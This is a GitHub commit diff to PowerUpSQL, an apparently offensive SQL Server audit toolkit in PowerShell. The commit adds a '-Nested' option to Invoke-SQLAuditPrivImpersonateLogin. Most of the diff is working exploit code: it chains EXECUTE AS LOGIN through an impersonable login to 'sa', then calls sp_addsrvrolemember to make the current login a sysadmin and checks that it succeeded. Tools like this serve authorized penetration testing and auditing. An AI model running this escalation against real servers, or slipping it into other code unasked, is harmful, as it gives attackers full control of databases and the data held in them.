Skip to content

Commit 690b788

Browse files
D00MFistD00MFist
committed
Nested Function
Added Nested Function (under Invoke-SQLAuditPrivImpersonateLogin)
1 parent a4752bf commit 690b788

File tree

1 file changed

+45
-1
lines changed

1 file changed

+45
-1
lines changed

PowerUpSQL.ps1

Lines changed: 45 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -21854,6 +21854,8 @@ Function Invoke-SQLAuditPrivImpersonateLogin
2185421854
Don't output anything.
2185521855
.PARAMETER Exploit
2185621856
Exploit vulnerable issues
21857+
.PARAMETER Nested
21858+
Exploit Nested Impersonation Capabilites
2185721859
.EXAMPLE
2185821860
PS C:\> Invoke-SQLAuditPrivImpersonateLogin -Instance SQLServer1\STANDARDDEV2014 -Username evil -Password Password123!
2185921861

@@ -21917,7 +21919,11 @@ Function Invoke-SQLAuditPrivImpersonateLogin
2191721919

2191821920
[Parameter(Mandatory = $false,
2191921921
HelpMessage = 'Exploit vulnerable issues.')]
21920-
[switch]$Exploit
21922+
[switch]$Exploit,
21923+
21924+
[Parameter(Mandatory = $false,
21925+
HelpMessage = 'Exploit Nested Impersonation Capabilites.')]
21926+
[switch]$Nested
2192121927
)
2192221928

2192321929
Begin
@@ -22069,6 +22075,44 @@ Function Invoke-SQLAuditPrivImpersonateLogin
2206922075
Write-Verbose -Message "$Instance : - EXPLOITING: The current login ($CurrentLogin) is already a sysadmin. No privilege escalation needed."
2207022076
$Exploited = 'No'
2207122077
}
22078+
}
22079+
# ---------------------------------------------------------------
22080+
# Exploit Nested Impersonation Vulnerability
22081+
# ---------------------------------------------------------------
22082+
if($Nested)
22083+
{
22084+
# Status user
22085+
Write-Verbose -Message "$Instance : - EXPLOITING: Starting Nested Impersonation exploit process (under assumption to levels of nesting and 1st first can impersonate sa)..."
22086+
22087+
# Check if user is already a sysadmin
22088+
$SysadminPreCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status
22089+
if($SysadminPreCheck -eq 0)
22090+
{
22091+
# Status user
22092+
Write-Verbose -Message "$Instance : - EXPLOITING: Verified that the current user ($CurrentLogin) is NOT a sysadmin."
22093+
Write-Verbose -Message "$Instance : - EXPLOITING: Attempting to add the current user ($CurrentLogin) to the sysadmin role..."
22094+
22095+
# Attempt to add the current login to sysadmins fixed server role
22096+
$null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "EXECUTE AS LOGIN = '$ImpersonatedLogin';EXECUTE AS LOGIN = 'sa';EXEC sp_addsrvrolemember '$CurrentLogin','sysadmin'"
22097+
22098+
# Verify the login was added successfully
22099+
$SysadminPostCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status
22100+
if($SysadminPostCheck -eq 1)
22101+
{
22102+
Write-Verbose -Message "$Instance : - EXPLOITING: It was possible to make the current user ($CurrentLogin) a sysadmin!"
22103+
$Exploited = 'Yes'
22104+
}
22105+
else
22106+
{
22107+
Write-Verbose -Message "$Instance : - EXPLOITING: It was not possible to make the current user ($CurrentLogin) a sysadmin."
22108+
}
22109+
}
22110+
else
22111+
{
22112+
# Status user
22113+
Write-Verbose -Message "$Instance : - EXPLOITING: The current login ($CurrentLogin) is already a sysadmin. No privilege escalation needed."
22114+
$Exploited = 'No'
22115+
}
2207222116
}
2207322117
}
2207422118
else

0 commit comments

Comments
 (0)